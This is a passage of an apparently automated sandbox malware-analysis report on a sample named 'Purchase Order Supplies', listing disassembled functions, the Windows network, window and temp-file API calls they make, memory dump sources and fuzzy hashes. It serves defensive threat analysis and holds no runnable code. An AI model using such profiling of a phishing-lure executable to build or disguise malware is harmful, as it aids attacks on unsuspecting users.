                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CE544C
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CE5475
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: ebc84f666c0c0b2fb29a714f4bb79397fe6f8cf2ad1c56de6d3c6787d7c85351
                          • Instruction ID: 8e36b6add628ab6558524179fe7a6629a8afd023b494f17b73066268bcc382d6
                          • Opcode Fuzzy Hash: ebc84f666c0c0b2fb29a714f4bb79397fe6f8cf2ad1c56de6d3c6787d7c85351
                          • Instruction Fuzzy Hash: 3411A370541AA1BADB158F538C84EFBFB69FF1275AF10812AF55596080E7705A80D6F0
                          Function 00CEACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          • Opcode ID: 0b593033491f9caeee2b2cc9cbbc3f44505e97ad8cade32ae56d071342f9b73b
                          • Instruction ID: 8d8bdd1b20df6984e6c730a9d3aeb2ad9912f1477fe022b93e3cd13c774f994e
                          • Opcode Fuzzy Hash: 0b593033491f9caeee2b2cc9cbbc3f44505e97ad8cade32ae56d071342f9b73b
                          • Instruction Fuzzy Hash: BE01C034200245AFCB109FA5CC46FA9B365EF04720F10852AF5169B3D1DB71F905C765
                          Function 00CCC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CCC5E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: 592cc21bfaa202b1c4c35b61732d7f57a5ff82dc107b00095ae69597c8032189
                          • Instruction ID: ec0a061749fef2f177991244bdb15dd49e0ea76be6199f9e5506d6348ec626c4
                          • Opcode Fuzzy Hash: 592cc21bfaa202b1c4c35b61732d7f57a5ff82dc107b00095ae69597c8032189
                          • Instruction Fuzzy Hash: B001B571641218ABCB04EB64CC92DFE7369AB463507140619F432E72D1DF306908A760
                          Function 00CDC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          • Opcode ID: d7654bcad7d7a3a089c3a798eb9b25b9835d7be20c8a41de32f22e0221aaa833
                          • Instruction ID: 6ee9126ffc10eb8bcc7ae217c254a16c94a30413ac7aadbd6766670b3c4468a3
                          • Opcode Fuzzy Hash: d7654bcad7d7a3a089c3a798eb9b25b9835d7be20c8a41de32f22e0221aaa833
                          • Instruction Fuzzy Hash: 9401B572904258BEDB28D7A8C856EFE7BF89B15711F00415AE193D6281E5B4A708DB60
                          Function 00CCC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CCC4E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: 021a7f083e64c132d62b43ad8a85b9794eb88bffb5e8a07c6a777eea344d7af7
                          • Instruction ID: 66cf54124ca104eb6165bd08bbc6080d0008387048b363546669574228edf1b2
                          • Opcode Fuzzy Hash: 021a7f083e64c132d62b43ad8a85b9794eb88bffb5e8a07c6a777eea344d7af7
                          • Instruction Fuzzy Hash: 0B018F716411086BCB09EBA4C9A2FFF73A99B05340F144019F902E32D1DA545E09A7B1
                          Function 00CCC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CCC562
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: ed7532c627e6c8cada44fac9195888f937615ea086d30eb8d10dc5c571c7ca30
                          • Instruction ID: f7fd31d9d69dcb07cb98c7ad2a51dd160cec0f38e87c9be83ef8bd72bd165191
                          • Opcode Fuzzy Hash: ed7532c627e6c8cada44fac9195888f937615ea086d30eb8d10dc5c571c7ca30
                          • Instruction Fuzzy Hash: 5201AD71A411086BCB05EBA4C992FFF73A99B05741F140019F807E3291DA54AF09B3B1
                          Function 00CD804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: ba5209efc8ad40664e6bb40c341e9afb3dd45ed5e8678157f15e5dd71a702f12
                          • Instruction ID: 0ace7323974bd8709aa8ee45fc06503bc9e453ac4190d11c9dfd23e6d9f3260c
                          • Opcode Fuzzy Hash: ba5209efc8ad40664e6bb40c341e9afb3dd45ed5e8678157f15e5dd71a702f12
                          • Instruction Fuzzy Hash: 23E0D83360032927D720EBA99C0AED7FBBCEB517A4F000026F924D3141DB70AA4587E5
                          Function 00CCB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CCB36B
                            • Part of subcall function 00CB2011: _doexit.LIBCMT ref: 00CB201B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: a1bd44781ab7d3dbaa8dd812f8361d5578c5d615fa09b8c8447b9f172dc3375e
                          • Instruction ID: 6a62799fb7c57f493fed795653f34449993e4d43cf9290688209f06834bd3218
                          • Opcode Fuzzy Hash: a1bd44781ab7d3dbaa8dd812f8361d5578c5d615fa09b8c8447b9f172dc3375e
                          • Instruction Fuzzy Hash: FBD012322C535837D61972987C0BFD976884F15B52F544015FF48951D28AD5958052A9
                          Function 00CF84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF84DF
                          • PostMessageW.USER32(00000000), ref: 00CF84E6
                            • Part of subcall function 00CD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD83CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: ee42f44de7db7acfb3bfbdcd4a2f402678f3738e686c3748cf8ae593a17e05be
                          • Instruction ID: a105218f020cf9ee33ccf68f665c62f83d02f6a7719532b0839805aef535b314
                          • Opcode Fuzzy Hash: ee42f44de7db7acfb3bfbdcd4a2f402678f3738e686c3748cf8ae593a17e05be
                          • Instruction Fuzzy Hash: 2FD022323803247BE721A330AC0FFC77605AB18B00F000829B30AEA3D0CEE0B804C230
                          Function 00CF8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF849F
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CF84B2
                            • Part of subcall function 00CD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD83CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 2350922385cbff208aa0d3418710ae29e137769812c192801a641be9d95c5635
                          • Instruction ID: b2f142f468d052a0ca2d296bb5899990668c75e2e9a3db05bf1c2be341a986a5
                          • Opcode Fuzzy Hash: 2350922385cbff208aa0d3418710ae29e137769812c192801a641be9d95c5635
                          • Instruction Fuzzy Hash: 9FD0A932384324BBE620A330AC0BFD67A05AB14B00F000829B30AAA2D0CEA0A804C230
                          Function 00CDD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00CDD01E
                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CDD035
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: efe8a4ab0c3b310c16210f757e6e36d6a517c686540de5eea68cf6db9e9ed7c0
                          • Instruction ID: 45d32e48da618c63d94e4034329d0f0a96742b41553426876936e7a22914fb66
                          • Opcode Fuzzy Hash: efe8a4ab0c3b310c16210f757e6e36d6a517c686540de5eea68cf6db9e9ed7c0
                          • Instruction Fuzzy Hash: C7D05EB554030EBBDB10ABA0ED0EF99776CA704704F1081907624D50D1D7B4D64A8BB4